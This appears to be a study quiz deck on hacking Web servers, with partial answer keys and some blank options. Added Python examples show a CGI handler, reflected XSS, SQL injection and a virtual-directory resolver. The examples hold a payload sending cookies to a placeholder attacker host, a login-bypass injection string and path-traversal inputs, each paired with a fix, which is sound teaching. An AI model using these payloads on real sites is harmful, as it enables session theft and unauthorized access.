Deck 10: Hacking Web Servers

Question
CGI programs can be written in many different programming and scripting languages, such as C/C++, Perl, UNIX shells, Visual Basic, and FORTRAN.
Answer: True
Question
All CFML tags begin with "____".

A)?
B)CF
C)CFML
D)%
Answer: B
Question
Connecting to a Microsoft Active Directory Service database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Answer: A
Question
____ is the interface that describes how a Web server passes data to a Web browser.

A)Perl
B)ASP
C)CGI
D)PHP
Question
____ is a standard database access method developed by the SQL Access Group.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Question
____ was originally used primarily on UNIX systems, but is used more widely now on many platforms, such as Macintosh and Windows.

A)HTML
B)JScript
C)VBScript
D)PHP
Question
Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
Question
ColdFusion uses its own proprietary tags written in ____.

A)XML
B)DHTML
C)PHP
D)CFML
Question
The column tag in CFML is ____.

A)
B)
C)<%COL>
D)
Question
The ____ Search page is an excellent starting point when investigating VBScript vulnerabilities.

A)CVE Web site
B)CERT
C)Microsoft Security Bulletin
D)Macromedia security
Question
A user can view the source code of a PHP file by using the browser's "View Source" option.
Question
____, developed by Microsoft, is a set of interfaces that enable applications to access data stored in a database management system.

A)OLE DB
B)ODBC
C)ADO
D)JDBC
Question
Visual Basic Script (VBScript) is a scripting language developed by ____.

A)Sun Microsystems
B)Symantec
C)Macromedia
D)Microsoft
Question
OLE DB relies on connection strings that enable the application to access the data stored on an external device.
Question
Web servers use the ____ element in an HTML document to allow customers to submit information to the Web server.

A)
B)
C)
D)
Question
The JavaScript getElementById() function is a method defined by the ____ Document Object Model (DOM).

A)W3C
B)IETF
C)Internet Society
D)IEEE
Question
To check whether a CGI program works, you should save the program to the ____ directory of your Web server, and then enter the URL in your Web browser.

A)bin
B)cgi-bin
C)cgi
D)scripts
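Added example, not code from the original deck or its textbook: a minimal CGI program in Python that shows the interface the CGI questions refer to. The server hands the request to the program through environment variables (REQUEST_METHOD, QUERY_STRING, CONTENT_LENGTH) and, for POST, through standard input; the program answers with a header block, a blank line and the body on standard output. The two sample requests are constructed inline, not captured from a real server.

```python
"""Minimal CGI program (added illustration). The Web server passes request
data in environment variables and, for POST, on stdin; the program writes
headers, a blank line and the body to stdout."""
import html
import io
import os
import sys
from urllib.parse import parse_qs

# Constructed sample requests (not captured from a real server).
SAMPLE_GET_ENV = {"REQUEST_METHOD": "GET", "QUERY_STRING": "name=Alice&lang=en"}
SAMPLE_POST_BODY = "name=Bob+%3Cb%3E"
SAMPLE_POST_ENV = {
    "REQUEST_METHOD": "POST",
    "CONTENT_TYPE": "application/x-www-form-urlencoded",
    "CONTENT_LENGTH": str(len(SAMPLE_POST_BODY)),
}


def handle_cgi(environ, stdin):
    """Return the complete CGI response (headers, blank line, body) as text."""
    method = environ.get("REQUEST_METHOD", "GET")
    if method == "POST":
        # The server passes a POST body on stdin; CONTENT_LENGTH says how
        # much to read. Reading past it would block waiting on the server.
        length = int(environ.get("CONTENT_LENGTH") or 0)
        raw = stdin.read(length)
    else:
        # For GET the form data arrives URL-encoded in QUERY_STRING.
        raw = environ.get("QUERY_STRING", "")
    params = parse_qs(raw, keep_blank_values=True)
    name = params.get("name", ["stranger"])[0]
    # The field is attacker-controlled: encode it before it goes into HTML.
    body = "<html><body><p>Hello, " + html.escape(name) + "</p></body></html>\n"
    headers = "Content-Type: text/html; charset=utf-8\r\n\r\n"
    return headers + body


def run_sample(method):
    """Run handle_cgi over one of the constructed sample requests."""
    if method == "POST":
        return handle_cgi(SAMPLE_POST_ENV, io.StringIO(SAMPLE_POST_BODY))
    return handle_cgi(SAMPLE_GET_ENV, io.StringIO(""))


if __name__ == "__main__":
    if "REQUEST_METHOD" in os.environ:   # launched by a Web server
        sys.stdout.write(handle_cgi(os.environ, sys.stdin))
    else:                                # run by hand: use the samples
        sys.stdout.write(run_sample("GET"))
        sys.stdout.write(run_sample("POST"))
```

Dropped into the server's cgi-bin directory and requested by URL, the same script answers real requests; the header block ends with a blank line (CRLF CRLF), which is what separates headers from body in the CGI response format.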
Question
Connecting to an MS SQL Server database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
JavaScript is a server-side scripting language that is embedded in an HTML Web page.
Question
Connecting to a MySQL database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
In Windows, IIS stands for ______________________________.
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
helps beginning Web application security testers gain a better understanding of the areas covered in the OWASP top ten Web applications vulnerability list
Question
SQL ____ involves the attacker supplying SQL commands when prompted to fill in a Web application field.

A)redirection
B)spoofing
C)injection
D)insertion
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
language developed by Microsoft
Question
In a(n) ____ flaw, a Web browser might carry out code sent from a Web site.

A)broken access control
B)command injection
C)cross-site scripting
D)unvalidated parameters
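Added example, not code from the original deck or its textbook: a reflected cross-site scripting flaw in Python. A search page echoes its query parameter into two HTML contexts (text and a quoted attribute); the vulnerable version reflects it verbatim, so the browser parses the attacker's markup and runs the script, while the safe version encodes it. The two payloads are constructed samples, and attacker.example is a placeholder host name.

```python
"""Reflected XSS (added illustration): the browser carries out code that the
Web site sent back to it because user input reached the page unencoded."""
import html

# Payload for an HTML text context: the browser runs the script, which
# sends the victim's cookie to a host the attacker controls (placeholder).
SCRIPT_PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
                  "+document.cookie</script>")
# Payload for a quoted attribute context: no <script> tag needed, the quote
# breaks out of value="..." and adds an event handler that fires on focus.
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def render_vulnerable(query):
    """Reflects the parameter into two HTML contexts without encoding."""
    return ('<p>Results for: ' + query + '</p>\n'
            '<input name="q" value="' + query + '">')


def render_safe(query):
    """Encodes for both contexts. quote=True also encodes ' and ", which is
    what stops the attribute-context payload."""
    enc = html.escape(query, quote=True)
    return ('<p>Results for: ' + enc + '</p>\n'
            '<input name="q" value="' + enc + '">')


def reflected_verbatim(render, payload):
    """True if the payload reaches the page unchanged, i.e. the browser
    will parse it as markup rather than display it as text."""
    return payload in render(payload)


def demo():
    """Outcome of each payload against the vulnerable and the safe page."""
    return {
        "vulnerable_script": reflected_verbatim(render_vulnerable, SCRIPT_PAYLOAD),
        "vulnerable_attr": reflected_verbatim(render_vulnerable, ATTRIBUTE_PAYLOAD),
        "safe_script": reflected_verbatim(render_safe, SCRIPT_PAYLOAD),
        "safe_attr": reflected_verbatim(render_safe, ATTRIBUTE_PAYLOAD),
    }


if __name__ == "__main__":
    print(demo())
    print(render_safe(ATTRIBUTE_PAYLOAD))
```

The attribute payload is the one testers most often miss: a filter that only looks for `<script` lets it through, and an encoder that leaves quotes alone does too. Output encoding has to match the context the value lands in.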
Question
Connecting to a VSAM database with OLE DB requires using ____ as the provider.

A)ADSDSOOBJECT
B)MySQLProv
C)SQLOLEDB
D)SNAOLEDB
Question
CFML stands for ______________________________.
Question
____ represent(s) a comment in SQL.

A)Double slashes (//)
B)An exclamation point (!)
C)An asterisk (*)
D)Double hyphens (--)
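Added example, not code from the original deck or its textbook: it serves both the SQL injection question and the SQL comment question above. A login form field is concatenated into a query, so the text `alice' --` closes the string literal and the double hyphen comments out the password check; the parameterized version binds the same text as data. The database and its two accounts are constructed sample data in an in-memory SQLite table.

```python
"""SQL injection through a form field, and the parameterized fix (added
illustration). The users table and its rows are constructed sample data."""
import sqlite3


def make_db():
    """In-memory SQLite database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, so whatever the user typed
    into the form field is parsed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized statement: the field text is bound as data and can
    never change the query's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# What the attacker types into the username field. The single quote closes
# the string literal and the double hyphen comments out the rest of the
# statement, including the password check.
PAYLOAD = "alice' --"


def demo():
    """Outcome of the same form submission against both versions."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, PAYLOAD, "wrong-password"),
        "safe": login_safe(conn, PAYLOAD, "wrong-password"),
        "legitimate": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats a tester should keep in mind: SQLite and SQL Server accept a bare `--`, but MySQL only treats `--` as a comment when it is followed by whitespace, so payloads against MySQL end in `-- ` or use `#`; and the fix is parameterization, not escaping quotes, because escaping rules differ per database and are easy to get wrong.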
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
a Web server
Question
____ is one of the best tools for scanning the Web for systems with CGI vulnerabilities.

A)Cgiscan.c
B)WebGoat
C)Wfetch
D)Phfscan.c
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
tool for searching Web sites for CGI scripts that can be exploited
Question
One of the best Web sites to find tools for hacking Web applications is ____.

A)http://www.cert.org
B)http://www.owasp.org
C)http://www.cve.mitre.org
D)http://packetstormsecurity.org
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
GUI tool that can be downloaded free from Microsoft and is included in the IIS Resource Kit
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
foundation of most Web applications
Question
____________________ Web pages display the same information regardless of the time of day or the user who activates the page.
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
main role is passing data between a Web server and Web browser
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
stands for cross-site scripting flaw
Question
____________________ Web pages can vary the information that's displayed depending on variables such as the current time and date, user name, and purchasing history (information collected via cookies or Web bugs).
Question
MATCHING
Match each term with the correct statement below.
a. WebGoat
b. HTML
c. CGI
d. Cgi Scanner v1.4
e. Apache
f. Wfetch
g. JScript
h. virtual directory
i. XSS
keeps attackers from knowing the directory structure on an IIS Web server
Question
To keep attackers from knowing the directory structure you create on an IIS Web server, creating a(n) ____________________ is recommended so that the path a user sees on the Web browser is not the actual path on the Web server.
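Added example, not code from the original deck or its textbook: the mapping a virtual directory performs, written out in Python so the point of the question is visible. The alias the browser sees (`/downloads`) is resolved to a physical folder that the URL never reveals, and the resolver normalizes the path before matching so `..` and `%2e%2e` sequences cannot climb out of the mapped folder. The alias table and the disk paths are constructed samples; a real IIS server keeps this mapping in its configuration, not in application code.

```python
"""Virtual directory resolution (added illustration): the folder name in
the URL is an alias, not the real path on disk. Alias table is constructed."""
import posixpath
from urllib.parse import unquote

# Alias seen in the URL -> physical folder (constructed sample mapping).
VIRTUAL_DIRS = {
    "/downloads": "D:/corpdata/public/files",
    "/": "C:/inetpub/wwwroot",
}


def resolve(url_path):
    """Map a request path to a physical path. Returns None when the path
    matches no alias or would land outside the alias's physical folder."""
    path = unquote(url_path.split("?", 1)[0])   # decode %xx first
    path = path.replace("\\", "/")               # IIS treats \ as a separator
    if not path.startswith("/"):
        path = "/" + path
    # Collapse '.' and '..' so traversal is resolved before alias matching.
    clean = posixpath.normpath(path)
    # Longest alias wins so /downloads is not swallowed by /.
    for alias in sorted(VIRTUAL_DIRS, key=len, reverse=True):
        base = alias.rstrip("/")
        prefix = base + "/"
        if clean != base and not clean.startswith(prefix):
            continue
        root = VIRTUAL_DIRS[alias]
        rel = clean[len(prefix):].lstrip("/") if clean.startswith(prefix) else ""
        target = posixpath.normpath(posixpath.join(root, rel)) if rel else root
        # Defence in depth: never serve anything outside the mapped folder,
        # even if a later change to the normalization above lets '..' through.
        if target != root and not target.startswith(root + "/"):
            return None
        return target
    return None


if __name__ == "__main__":
    for p in ("/downloads/report.pdf", "/index.html",
              "/downloads/..%2F..%2F..%2Fwindows/win.ini", "/downloads/..\\..\\secret"):
        print(p, "->", resolve(p))
```

The traversal attempts end up under the Web root rather than on the D: drive, which is the behaviour to verify when testing a server that uses virtual directories: request the alias with encoded and backslash variants of `..` and confirm nothing outside the mapped folder is returned.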
Question
What is JavaScript?
Question
What is OWASP?
Question
What is ODBC used for?
Question
What is ActiveX Data Objects (ADO)?
Question
As a security professional, what should you do after identifying that a Web server you are testing is using PHP?
Question
What is ColdFusion?
Question
Why should security professionals have at least a little knowledge about the Apache Web Server?
Question
Dynamic Web pages need special components for displaying information that changes depending on user input or information obtained from a back-end server. What kind of components can Web pages use to achieve this?
Question
What is VBScript?
Question
What features does the current version of Wfetch offer?
Question
What can an attacker do after gaining control of a Web server?
Question
What is the main difference between HTML pages and Active Server Pages (ASP)?